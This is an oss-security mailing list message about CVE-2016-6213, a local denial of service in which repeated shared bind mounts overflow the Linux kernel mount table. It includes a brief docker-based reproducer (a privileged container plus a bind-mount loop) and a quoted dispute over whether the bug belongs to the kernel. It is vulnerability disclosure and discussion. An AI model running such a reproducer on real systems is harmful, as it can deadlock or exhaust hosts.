oss-sec mailing list archives
Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount
From: CAI Qian <caiqian () redhat com>
Date: Thu, 14 Jul 2016 12:15:02 -0400 (EDT)
Maybe this is a better reproducer using docker. It is exploitable even with user namespace enabled. # docker run -it -v /mnt/:/mnt/:shared --cap-add=SYS_ADMIN rhel7 /bin/bash # cat /proc/self/uid_map 0 995 65536 # cat /proc/self/gid_map 0 992 65536 (insider container) # for i in `seq 1 20`; mount -o bind /mnt/1 /mnt/2; done CAI Qian ----- Original Message -----
From: "Greg KH" <greg () kroah com> To: oss-security () lists openwall com Cc: caiqian () redhat com, cve-assign () mitre org Sent: Wednesday, July 13, 2016 6:45:00 PM Subject: Re: [oss-security] Re: cve request: local DoS by overflowing kernel mount table using shared bind mount On Wed, Jul 13, 2016 at 12:59:40PM -0400, cve-assign () mitre org wrote:It was reported that the mount table expands by a power-of-two with each bind mount command.If the system is configured in the way that a non-root user allows bind mount even if with limit number of bind mount allowed, a non-root user could cause a local DoS by quickly overflow the mount table.it will cause a deadlock for the whole system,form of unlimited memory consumption that is causing the problemUse CVE-2016-6213.A CVE for an "improperly configured system"? Huh? What distro has such a configuration set by default? This isn't a kernel bug, so what is this CVE classified as being "against"? It better not be against the Linux kernel... confused, greg k-h
Current thread:
- cve request: local DoS by overflowing kernel mount table using shared bind mount CAI Qian (Jul 13)
- Re: cve request: local DoS by overflowing kernel mount table using shared bind mount cve-assign (Jul 13)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount Greg KH (Jul 13)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount CAI Qian (Jul 14)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount Jessica Frazelle (Jul 14)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount CAI Qian (Jul 15)
- Re: cve request: local DoS by overflowing kernel mount table using shared bind mount Jesse Hertz (Jul 15)
- Re: Re: cve request: local DoS by overflowing kernel mount table using shared bind mount Greg KH (Jul 13)
- Re: cve request: local DoS by overflowing kernel mount table using shared bind mount cve-assign (Jul 13)